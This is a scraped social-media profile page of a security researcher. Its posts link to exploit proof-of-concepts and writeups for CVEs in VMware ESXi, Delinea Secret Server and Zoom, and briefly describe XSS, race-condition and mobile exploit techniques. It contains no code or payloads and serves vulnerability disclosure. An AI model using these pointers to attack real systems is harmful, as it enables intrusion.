Olivia
Online
straightblast
@straight_blast
Joined January 2017
54 Following
1.3K Followers
70 Posts
Pinned Tweet
Here is my RCE exploit code and writeup for (CVE-2021-21974) VMware ESXi OpenSLP heap-overflow discovered by @_wmliang_. Thank you again for your write-up.
[PoC] https://t.co/MCf3TV6IjH
[writeup] https://t.co/LoKlsYVyAJ
My good friend @darkfloyd1014 and his crew will be hosting the VXcon security conference https://t.co/oIVUDegfT9 in Hong Kong 🇭🇰 this year. It will be packed with great talks. Security enthusiasts in the Asia Pacific area should go check it out.
@saidelike All the best in your new journey!
I recently developed and posted about a technique called "First sequence sync", expanding @albinowax's single packet attack.
This technique allowed me to send 10,000 requests in 166ms, which breaks the packet size limitation of the single packet attack.
https://t.co/puM7hZWIlE
🔥 XSS on any website with missing charset information? 😳
Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post:
https://t.co/Ji3V0fK5b6
#appsec #security #vulnerability
The Delinea Secret Server auth bypass vulnerability I discovered earlier this year, that can net access to all stored secrets, has just been assigned CVE-2024-33891. Relive the story - https://t.co/9H0LzYAsh4
CVE-2024-33891 Delinea Secret Server before 11.7.000001 allows attackers to bypass authentication via the SOAP API in SecretServer/webservices/SSWebService.asmx. This is related to … https://t.co/zl8KFoVgh4
Here is my writeup and PoC for the AuthN/AuthZ bypass vulnerability in Delinea Secret Server I found some time ago. The patch is available, go update.
[Write up/PoC] - https://t.co/9H0LzYAsh4
[Patch Information] - https://t.co/vmuZiNupG8
[Vendor Update] - https://t.co/cpsrc0ST4L
Last year, Brandon and Ali went looking for new attack surface area in Microsoft Exchange. Ultimately, they were able to crash the Exchange file scanner by simply sending an email. Read more on our blog: https://t.co/a2srsBGLIm
Unfortunately I have to reshare this as I'm still looking for a position.
Had several good initial opportunities but in a lot of cases they were looking for someone less senior and not a web app SME.
If your company are hiring specifically web app testers, please DM me. ��
@Switshady @_wmliang_ It is exploitable if an individual can make a packet reach the vulnerable service
Here is my RCE exploit code and writeup for (CVE-2021-21974) VMware ESXi OpenSLP heap-overflow discovered by @_wmliang_. Thank you again for your write-up.
[PoC] https://t.co/MCf3TV6IjH
[writeup] https://t.co/LoKlsYVyAJ
Here are the slides from the "Attacking JavaScript Engines in 2022" talk by @itszn13 and myself @offensive_con. It's a high-level talk about JS, JIT, various bug classes, and typical exploitation flows but with lots of references for further digging! https://t.co/DtHsLa34Da
- Use-after-frees from JIT
- CodeQL for variant analysis
- Never-before-seen exploit primitives
- Tenured heap tomfoolery
I’ve packed just about everything in this post!
@richinseattle Congrats Rich
@adamely I believe some countries already adopted such approach. Is there some reason why we don’t see it done (if any) in USA?
One of my Zoom Client finding CVE-2021-34425 that I discovered when I was still with Walmart Global Tech got announced.
CVE-2021-34425 The Zoom Client for Meetings before version 5.7.3 (for Android, iOS, Linux, macOS, and Windows) contain a server side request forgery vulnerability in the chat’s “link preview” functionality. In versions prior to 5.7.3, if a user we... https://t.co/LyjBxH8j6w
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists,
activists and dissidents around the world. https://t.co/RYsqpTHF5j
Just watched "Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond" - must-read research by @intruder_io's Daniel Thatcher
https://t.co/KJTnPwGOAe
✨ New Workshop! Android Exploits 101 🔥📱
I put together an introductory overview of the "shape" of modern 0-day exploit chains for Android. Hope it's helpful 😊
https://t.co/MQGHsgMpTs
Here's a cool project I've been working on during my boring intro CS classes! It's heaptrace, a heap debugger that replaces addresses with symbols to help you understand a program's heap operations.
https://t.co/VMpCVbaaRd
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.3M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers